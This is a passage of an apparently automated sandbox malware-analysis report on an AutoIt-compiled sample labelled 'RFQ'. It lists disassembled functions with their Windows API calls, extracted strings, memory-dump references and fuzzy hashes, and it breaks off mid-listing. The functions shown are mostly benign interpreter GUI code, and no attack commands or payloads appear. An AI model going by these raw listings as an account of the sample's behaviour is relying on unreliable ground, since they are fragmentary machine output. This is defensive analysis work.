                                                                                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0078A55E
                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 0078A567
                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0078A576
                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0078A57F
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0078A586
                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 0078A591
                                                                                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0078A5A3
                                                                                                                                                    • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,007BD9BC,00000000), ref: 0078A5B9
                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 0078A5C9
                                                                                                                                                    • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0078A5EF
                                                                                                                                                    • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0078A60E
                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0078A630
                                                                                                                                                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0078A81D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                                    • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                    • API String ID: 2211948467-2373415609
                                                                                                                                                    • Opcode ID: f6941ed3fb580a172926bf44fef16ce57255831b209d42462257e61957267ee1
                                                                                                                                                    • Instruction ID: 2045e04d40c64005375f9d49991ab963d3d9f5ff5c8d139c088c39a8a0e26e72
                                                                                                                                                    • Opcode Fuzzy Hash: f6941ed3fb580a172926bf44fef16ce57255831b209d42462257e61957267ee1
                                                                                                                                                    • Instruction Fuzzy Hash: 8C028075900108EFEB14DFA8DD89EAE7BB9FB48310F008159F905AB2A1DB78DD41CB64
                                                                                                                                                    Function 0079D285 Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 0079D2DB
                                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 0079D30C
                                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 0079D318
                                                                                                                                                    • SetBkColor.GDI32(?,000000FF), ref: 0079D332
                                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 0079D341
                                                                                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 0079D36C
                                                                                                                                                    • GetSysColor.USER32(00000010), ref: 0079D374
                                                                                                                                                    • CreateSolidBrush.GDI32(00000000), ref: 0079D37B
                                                                                                                                                    • FrameRect.USER32(?,?,00000000), ref: 0079D38A
                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0079D391
                                                                                                                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 0079D3DC
                                                                                                                                                    • FillRect.USER32(?,?,00000000), ref: 0079D40E
                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0079D439
                                                                                                                                                      • Part of subcall function 0079D575: GetSysColor.USER32(00000012), ref: 0079D5AE
                                                                                                                                                      • Part of subcall function 0079D575: SetTextColor.GDI32(?,?), ref: 0079D5B2
                                                                                                                                                      • Part of subcall function 0079D575: GetSysColorBrush.USER32(0000000F), ref: 0079D5C8
                                                                                                                                                      • Part of subcall function 0079D575: GetSysColor.USER32(0000000F), ref: 0079D5D3
                                                                                                                                                      • Part of subcall function 0079D575: GetSysColor.USER32(00000011), ref: 0079D5F0
                                                                                                                                                      • Part of subcall function 0079D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0079D5FE
                                                                                                                                                      • Part of subcall function 0079D575: SelectObject.GDI32(?,00000000), ref: 0079D60F
                                                                                                                                                      • Part of subcall function 0079D575: SetBkColor.GDI32(?,00000000), ref: 0079D618
                                                                                                                                                      • Part of subcall function 0079D575: SelectObject.GDI32(?,?), ref: 0079D625
                                                                                                                                                      • Part of subcall function 0079D575: InflateRect.USER32(?,000000FF,000000FF), ref: 0079D644
                                                                                                                                                      • Part of subcall function 0079D575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0079D65B
                                                                                                                                                      • Part of subcall function 0079D575: GetWindowLongW.USER32(00000000,000000F0), ref: 0079D670
                                                                                                                                                      • Part of subcall function 0079D575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0079D698
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3521893082-0
                                                                                                                                                    • Opcode ID: 565779f2c7c1aa70005c21db152453a73e9ad6e89b988f5fcf873384d771216e
                                                                                                                                                    • Instruction ID: d754c091dc4dcaf3033fccf899e76700005760aa7c8955c8560c5a9a21a67273
                                                                                                                                                    • Opcode Fuzzy Hash: 565779f2c7c1aa70005c21db152453a73e9ad6e89b988f5fcf873384d771216e
                                                                                                                                                    • Instruction Fuzzy Hash: 0E917C71408305BFCB209F64DC08E6ABBA9FF89325F108B19F962961A0E779DD44CB56
                                                                                                                                                    Function 0074B8FD Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 491windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • DestroyWindow.USER32 ref: 0074B98B
                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0074B9CD
                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0074B9D8
                                                                                                                                                    • DestroyIcon.USER32(00000000), ref: 0074B9E3
                                                                                                                                                    • DestroyWindow.USER32(00000000), ref: 0074B9EE
                                                                                                                                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 007AD2AA
                                                                                                                                                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 007AD2E3
                                                                                                                                                    • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 007AD711
                                                                                                                                                      • Part of subcall function 0074B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0074B759,?,00000000,?,?,?,?,0074B72B,00000000,?), ref: 0074BA58
                                                                                                                                                    • SendMessageW.USER32 ref: 007AD758
                                                                                                                                                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 007AD76F
                                                                                                                                                    • ImageList_Destroy.COMCTL32(00000000), ref: 007AD785
                                                                                                                                                    • ImageList_Destroy.COMCTL32(00000000), ref: 007AD790
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                                                                                    • String ID: 0
                                                                                                                                                    • API String ID: 464785882-4108050209
                                                                                                                                                    • Opcode ID: df2c94e7a9e6907ca455950d64a7e931be4ef17694c7aae7b304d0462da74302
                                                                                                                                                    • Instruction ID: 335caa2f817b20bf759c49e3d5297faf6586e42aced9dcd424a3d424aefecf83
                                                                                                                                                    • Opcode Fuzzy Hash: df2c94e7a9e6907ca455950d64a7e931be4ef17694c7aae7b304d0462da74302
                                                                                                                                                    • Instruction Fuzzy Hash: 2B128F70504241DFDB25CF24C888BA9B7E5FF9A304F144669F98ACBA62C739EC51CB91
                                                                                                                                                    Function 0077DBC4 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0077DBD6
                                                                                                                                                    • GetDriveTypeW.KERNEL32(?,007CDC54,?,\\.\,007CDC00), ref: 0077DCC3
                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,007CDC54,?,\\.\,007CDC00), ref: 0077DE29
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorMode$DriveType
                                                                                                                                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                                    • API String ID: 2907320926-4222207086
                                                                                                                                                    • Opcode ID: 911308254cf046bdc55aa31c509ece29704cf511bd38cad240f87659fbc6bbe7
                                                                                                                                                    • Instruction ID: f9e27fabd75bc06ac9d5b7c59fcaad4de24c17840dbe8be922ef6191b148284c
                                                                                                                                                    • Opcode Fuzzy Hash: 911308254cf046bdc55aa31c509ece29704cf511bd38cad240f87659fbc6bbe7
                                                                                                                                                    • Instruction Fuzzy Hash: EA51B3B0308342EB8A30DF15C989869B7B1FF98780F20D91AF01B9B295DB6DDD45D742
                                                                                                                                                    Function 0073CC24 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 267COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __wcsnicmp
                                                                                                                                                    • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                                                    • API String ID: 1038674560-86951937
                                                                                                                                                    • Opcode ID: cafe11888937552ca7c7c7bcbfaedec7799cd71c01bee5847f979bbcbe7df384
                                                                                                                                                    • Instruction ID: 00790dfb47cabf6ff5f3acb32eae75de17620038db8d2575eccd320dcba607d1
                                                                                                                                                    • Opcode Fuzzy Hash: cafe11888937552ca7c7c7bcbfaedec7799cd71c01bee5847f979bbcbe7df384
                                                                                                                                                    • Instruction Fuzzy Hash: 2C812870740215FBEB22AA64CC86FBB7769AF55301F044039FD06BA183EB6CD946C7A1
                                                                                                                                                    Function 0079C6E9 Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 447windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 0079C788
                                                                                                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0079C83E
                                                                                                                                                    • SendMessageW.USER32(?,00001102,00000002,?), ref: 0079C859
                                                                                                                                                    • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0079CB15
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$Window
                                                                                                                                                    • String ID: 0
                                                                                                                                                    • API String ID: 2326795674-4108050209
                                                                                                                                                    • Opcode ID: a4f28d2916f8b3cd1a56801f587d76d534398e082eebed5420dfe3887179ea55
                                                                                                                                                    • Instruction ID: 9baca86184c0e3b7c0f2de9ff705cb7c468c31c9717fc3ce388984a67f05725e
                                                                                                                                                    • Opcode Fuzzy Hash: a4f28d2916f8b3cd1a56801f587d76d534398e082eebed5420dfe3887179ea55
                                                                                                                                                    • Instruction Fuzzy Hash: 2CF1C271104301AFEF228F24E849BAABBE4FF49354F084629F599D62A1D77CDD40DBA1
                                                                                                                                                    Function 0079638D Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CharUpperBuffW.USER32(?,?,007CDC00), ref: 00796449
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: BuffCharUpper
                                                                                                                                                    • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                                                                    • API String ID: 3964851224-45149045
                                                                                                                                                    • Opcode ID: b749304384fc701bc049e3ee7ca8e65aac3e1878e576e11fc3e25dbaf2b73eae
                                                                                                                                                    • Instruction ID: 00a62d8d98db88296411519a47b974ed9ea9cbe26209e38779d508e93dc53a1b
                                                                                                                                                    • Opcode Fuzzy Hash: b749304384fc701bc049e3ee7ca8e65aac3e1878e576e11fc3e25dbaf2b73eae
                                                                                                                                                    • Instruction Fuzzy Hash: A6C1AE30604245CBCF04EF10D595AAE77A5BF99354F004969F8869B3A3DB3CED4ACB92
                                                                                                                                                    Function 0079D575 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetSysColor.USER32(00000012), ref: 0079D5AE
                                                                                                                                                    • SetTextColor.GDI32(?,?), ref: 0079D5B2
                                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 0079D5C8
                                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 0079D5D3
                                                                                                                                                    • CreateSolidBrush.GDI32(?), ref: 0079D5D8
                                                                                                                                                    • GetSysColor.USER32(00000011), ref: 0079D5F0
                                                                                                                                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0079D5FE
                                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 0079D60F
                                                                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 0079D618
                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 0079D625
                                                                                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 0079D644
                                                                                                                                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0079D65B
                                                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0079D670
                                                                                                                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0079D698
                                                                                                                                                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0079D6BF
                                                                                                                                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 0079D6DD
                                                                                                                                                    • DrawFocusRect.USER32(?,?), ref: 0079D6E8
                                                                                                                                                    • GetSysColor.USER32(00000011), ref: 0079D6F6
                                                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 0079D6FE
                                                                                                                                                    • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0079D712
                                                                                                                                                    • SelectObject.GDI32(?,0079D2A5), ref: 0079D729
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 0079D734
                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 0079D73A
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 0079D73F
                                                                                                                                                    • SetTextColor.GDI32(?,?), ref: 0079D745
                                                                                                                                                    • SetBkColor.GDI32(?,?), ref: 0079D74F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1996641542-0
                                                                                                                                                    • Opcode ID: a8c83ddf682c91a08d726d29899694cf7087a19ab4b42028d12a6c7c08e0aede
                                                                                                                                                    • Instruction ID: 479b1649757416be9e3824d565f49848f1895cc0771ef4b1231fdff6ca243437
                                                                                                                                                    • Opcode Fuzzy Hash: a8c83ddf682c91a08d726d29899694cf7087a19ab4b42028d12a6c7c08e0aede
                                                                                                                                                    • Instruction Fuzzy Hash: 18511A71900208BFDF209FA8DC48FAE7B79EF08324F118615F915AB2A1E7799E508F54
                                                                                                                                                    Function 0079B6C4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0079B7B0
                                                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0079B7C1
                                                                                                                                                    • CharNextW.USER32(0000014E), ref: 0079B7F0
                                                                                                                                                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0079B831
                                                                                                                                                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0079B847
                                                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0079B858
                                                                                                                                                    • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0079B875
                                                                                                                                                    • SetWindowTextW.USER32(?,0000014E), ref: 0079B8C7
                                                                                                                                                    • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0079B8DD
                                                                                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 0079B90E
                                                                                                                                                    • _memset.LIBCMT ref: 0079B933
                                                                                                                                                    • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0079B97C
                                                                                                                                                    • _memset.LIBCMT ref: 0079B9DB
                                                                                                                                                    • SendMessageW.USER32 ref: 0079BA05
                                                                                                                                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 0079BA5D
                                                                                                                                                    • SendMessageW.USER32(?,0000133D,?,?), ref: 0079BB0A
                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0079BB2C
                                                                                                                                                    • GetMenuItemInfoW.USER32(?), ref: 0079BB76
                                                                                                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0079BBA3
                                                                                                                                                    • DrawMenuBar.USER32(?), ref: 0079BBB2
                                                                                                                                                    • SetWindowTextW.USER32(?,0000014E), ref: 0079BBDA
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                                                                    • String ID: 0
                                                                                                                                                    • API String ID: 1073566785-4108050209
                                                                                                                                                    • Opcode ID: 22f6a5f13bf39572a2a1df49a971882357969e3ac598b7af2b26e25c7a215bf8
                                                                                                                                                    • Instruction ID: 1a3e2c258a0598dbd5598b392d3159e02ed476ab0fcc5363021b6f9e9185af92
                                                                                                                                                    • Opcode Fuzzy Hash: 22f6a5f13bf39572a2a1df49a971882357969e3ac598b7af2b26e25c7a215bf8
                                                                                                                                                    • Instruction Fuzzy Hash: A2E1A3B1900218EBDF20DFA5ED85EEE7B78FF05714F108256F919AA290D7789941CF60
                                                                                                                                                    Function 00732EC0 Relevance: 37.1, APIs: 8, Strings: 13, Instructions: 346COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Foreground
                                                                                                                                                    • String ID: ACTIVE$ALL$CLASS$H+~$HANDLE$INSTANCE$L+~$LAST$P+~$REGEXPCLASS$REGEXPTITLE$T+~$TITLE
                                                                                                                                                    • API String ID: 62970417-4219687078
                                                                                                                                                    • Opcode ID: abbe5ee5fae7860130d4d0cf40eb6ce201fe2808a90617275e0abea6c742ddca
                                                                                                                                                    • Instruction ID: 05b5fafbac9e22fb493bbd4343281337116276189ddf3582074158fbf582960e
                                                                                                                                                    • Opcode Fuzzy Hash: abbe5ee5fae7860130d4d0cf40eb6ce201fe2808a90617275e0abea6c742ddca
                                                                                                                                                    • Instruction Fuzzy Hash: FFD10730508242EBDB14EF14C885AAABBB4BF95344F104B2DF456535A3DB3CE95BCB91
                                                                                                                                                    Function 0079764F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetCursorPos.USER32(?), ref: 0079778A
                                                                                                                                                    • GetDesktopWindow.USER32 ref: 0079779F
                                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 007977A6
                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00797808
                                                                                                                                                    • DestroyWindow.USER32(?), ref: 00797834
                                                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0079785D
